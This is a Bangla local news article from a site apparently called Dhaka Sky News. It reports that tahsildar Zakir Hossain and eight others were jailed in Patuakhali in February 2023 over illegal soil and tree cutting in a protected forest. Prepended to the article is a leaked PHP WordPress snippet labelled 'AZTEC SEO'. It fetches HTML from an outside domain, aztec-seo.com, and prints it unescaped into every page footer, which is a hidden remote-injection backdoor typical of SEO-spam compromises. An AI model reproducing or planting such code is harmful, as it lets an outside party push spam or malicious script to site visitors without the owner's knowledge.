/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); তহসিলদার জাকির হোসেন কারাগারে | Dhaka Sky News

তুরস্ক ও সিরিয়াকে সহায়তা দিতে প্রস্তুত রাশিয়া

আগের সংবাদ

সাহিত্যদেশের স্টলে পাওয়া যাচ্ছে জিয়াউল হকের মুক্তিযুদ্ধের বিজয়গাঁথা-৫ গ্রন্থটি

পরের সংবাদ

তহসিলদার জাকির হোসেন কারাগারে

পটুয়াখালী প্রতিনিধি

প্রকাশিত: February 7, 2023 , 10:23 am

পটুয়াখালীতে বন বিভাগের মামলায় তহসিলদার জাকির হোসেনকে কারাগারে প্রেরণ করা হয়েছে।

মামলার সূত্রে জানা গেছে, পটুয়াখালীর গলাচিপায় সরকারি সংরক্ষিত বনে মাটি কেটে রাস্তা নির্মাণ ও গাছ কেটে পাচার করার অভিযোগ মামলার (মামলা নং-০২/আগ,০২/জিপি-১৫ অব ২০২২-২৩) তহসিলদার জাকির হোসেনসহ ১০ আসামি ৫ ফেব্রুয়ারি রবিবার গলাচিপা সিনিয়র জুডিসিয়াল ম্যাজিস্ট্রেট আদালতে হাজির হলে বিজ্ঞ বিচারক সিনিয়র জুডিসিয়াল ম্যাজিস্ট্রেট মামুনুর রহমান জামিন না মঞ্জুর করে ৫ নম্বর আসামি তহসিলদার (মরিচবুনিয়া ইউনিয়ন) জাকির হোসেনসহ ৯ জনকে জেলহাজতে প্রেরণের নির্দেশ দেন। মামলার ৯ নম্বর আসামি রেনু আক্তার সন্তানসম্ভবা হওয়ায় মানবিক বিবেচনায় তাকে জামিন দেন বিজ্ঞ বিচারক।

বিষয়টি নিশ্চিত করেছেন বনবিভাগের গলাচিপা উপজেলা রেঞ্জ কর্মকর্তা জাহাঙ্গীর হোসেন ও বাদী পক্ষের আইনজীবী মনিরুল ইসলাম। জেলহাজতে প্রেরিত অন্য ৮ আসামি হলেন- চরবিশ্বাস ইউনিয়নের দক্ষিণ চরবিশ্বাস গ্রামের শাহিন (৩৫), রিপন প্যাদা (৪০), জামাল প্যাদা (৩৫), মন্নান মাতুব্বর (৪৫), কাওছার (২৫), মাহাবুব প্যাদা (৫৫), দেলোয়ার হোসেন (৫৫) ও আনোয়ার মৃধার (৫০)।

মামলার সংক্ষিপ্ত বিবরণে জানা যায়, ২০২২ সালের ৭ নভেম্বর চর আগস্তি ফরেস্ট ক্যাম্পের অধীন দক্ষিণ চরবিশ্বাস গ্রামের আমগাছিয়া লঞ্চঘাটের দক্ষিণ পাশে সৃজিত বনে ভেকু মেশিন দিয়ে মাটি কাটা ও গাছ কাটার অপরাধে চর আগস্তি ফরেস্ট ক্যাম্পের বিট কর্মকর্তা আবদুল হাই বাদী হয়ে ১৯২৭ সনের বন আইনের যাহা ২০০০ সনে সংশোধিত ২৬ (১ক) ধারা ও একই ধারার (খ) ও (ঙ) উপধারা মতে অপরাধ সংঘটিত হওয়ায় উল্লেখিত মোঃ জাকির হোসেনসহ ১০ জনকে আসামি করে উক্ত আদালতে একটি মামলা করেন।

উল্লেখ্য, আসামি জাকির হোসেন ঘটনাকালীন সময় চরবিশ্বাস ইউনিয়নের তহসিলদার হিসাবে দায়িত্বে ছিলেন। বর্তমানে পটুয়াখালী সদর উপজেলার মরিচবুনিয়া ইউনিয়নে তহসিলদার পদে কর্মরত আছেন। তার বিরুদ্ধে জেলা প্রশাসক, সদর উপজেলা নির্বাহী অফিসারসহ বিভিন্ন কর্মকর্তাদের কাছে অনিয়মের অভিযোগ রয়েছে বলে স্থানীয়রা জানান।

পটুয়াখালী সদর উপজেলা নির্বাহী অফিসার সাইফুর রহমান জানান, মরিচবুনিয়া ইউনিয়নের তহসিলদার জাকির হোসেন জেল হাজতে গেছেন, ৬ ফেব্রুয়ারি সোমবার আমার অফিসে এসে জাকিরের স্ত্রী রেনু আক্তার আমাকে জানিয়েছেন।